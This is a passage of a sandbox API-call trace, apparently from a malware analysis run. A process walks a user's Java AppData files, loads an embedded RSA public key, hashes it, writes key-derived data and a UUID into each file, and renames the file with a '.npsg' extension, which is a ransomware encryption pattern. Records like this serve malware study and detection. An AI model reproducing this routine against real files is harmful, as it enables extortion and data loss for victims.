(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0242.245] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=719) returned 1 [0242.245] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0242.248] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.248] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0242.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0242.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0242.326] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0242.326] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2cf, lpOverlapped=0x0) returned 1 [0242.327] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.327] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.332] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0242.333] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0242.333] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0242.333] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0242.333] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0242.333] GetLastError () returned 0x0 [0242.333] CryptDestroyHash (hHash=0x33f0408) returned 1 [0242.333] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0242.333] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0242.333] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0242.333] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0242.333] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0242.334] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.334] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0242.334] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0242.334] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0242.335] CloseHandle (hObject=0x644) returned 1 [0242.336] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.npsg")) returned 1 [0242.339] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0242.339] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0242.339] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0242.339] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0242.339] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0242.339] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0242.340] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0242.340] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0242.340] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0242.340] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0242.340] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0242.340] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0242.340] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0242.340] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0242.340] PathFindFileNameW (pszPath="") returned="" [0242.340] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0242.341] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0242.341] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0242.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0242.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0242.352] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=25340970) returned 1 [0242.352] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0242.356] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.356] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0242.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0242.368] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x25805, lpOverlapped=0x0) returned 1 [0242.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0242.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.430] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0242.432] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0242.432] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0242.432] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0242.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0242.432] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0242.432] GetLastError () returned 0x0 [0242.433] CryptDestroyHash (hHash=0x33f0408) returned 1 [0242.433] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0242.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0242.433] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0242.433] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0242.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0242.433] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0242.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0242.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0242.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x3b95d50 [0242.435] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0242.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fbb0 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fb8 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fbf8 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0242.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89018 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0242.436] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0242.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0242.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0242.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0242.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0242.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89018 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89000 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bc90 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0242.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0242.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0242.437] GetCurrentThreadId () returned 0x5b4 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a3a8 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0242.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.438] GetCurrentThreadId () returned 0x5b4 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0242.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0242.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0242.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0242.439] RtlAllocateHeap 